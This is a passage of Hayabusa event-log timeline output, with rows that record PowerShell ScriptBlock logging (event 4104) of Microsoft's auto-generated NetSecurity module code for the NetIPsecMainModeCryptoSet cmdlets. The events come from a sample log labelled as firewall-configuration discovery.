[uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedType",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.989 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"s.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', 
${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeCryptoSet' function Set-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject 
(c",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.989 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"dxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') 
-and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeCryptoSet' function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] 
${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
